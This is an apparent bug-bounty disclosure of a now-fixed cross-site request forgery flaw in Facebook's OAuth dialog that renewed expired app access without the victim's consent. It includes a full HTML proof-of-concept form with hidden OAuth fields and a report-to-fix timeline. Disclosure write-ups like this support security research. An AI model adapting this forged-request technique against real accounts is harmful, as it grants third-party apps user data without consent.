[Facebook] CSRF to renew access to Apps

 It was possible for an attacker to renew access to Apps which have expired for the victim without the victim's consent.

CSRF  POC -

<html><body><script>history.pushState('', '', '/')</script><form action="https://www.facebook.com/v2.3/dialog/oauth"><input type="hidden" name="app&#95;id" value="XXX" /><input type="hidden" name="auth&#95;type" value="" /><input type="hidden" name="cbt" value="1622970398155" /><input type="hidden" name="channel&#95;url" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f11c70b8d77d13&amp;domain&#61;www&#46;jiosaavn&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;jiosaavn&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener" /><input type="hidden" name="client&#95;id" value="XXX" /><input type="hidden" name="display" value="popup" /><input type="hidden" name="domain" value="www&#46;XXX&#46;com" /><input type="hidden" name="e2e" value="&#123;&#125;" /><input type="hidden" name="fallback&#95;redirect&#95;uri" value="https&#58;&#47;&#47;www&#46;XXX&#46;com&#47;signup&#63;redirect&#61;&#47;" /><input type="hidden" name="fx&#95;app" value="facebook" /><input type="hidden" name="locale" value="en&#95;US" /><input type="hidden" name="logger&#95;id" value="f256cfb96281ce4" /><input type="hidden" name="origin" value="1" /><input type="hidden" name="redirect&#95;uri" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f232d7fd018cdac&amp;domain&#61;www&#46;jiosaavn&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;XXX&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener&amp;frame&#61;f3505dbd2db68" /><input type="hidden" name="response&#95;type" value="token&#44;signed&#95;request&#44;graph&#95;domain" /><input type="hidden" name="return&#95;scopes" value="false" /><input type="hidden" name="scope" value="public&#95;profile&#44;email" /><input type="hidden" name="sdk" value="joey" /><input type="hidden" name="version" value="v2&#46;3" /><input type="submit" value="Submit request" /></form></body></html>
Timeline -
Reported - Sunday, June 6, 2021Triaged - Friday, June 18, 2021Rewarded - Thursday, September 9, 2021 [with bonus]Fixed - Tuesday, November 30, 2021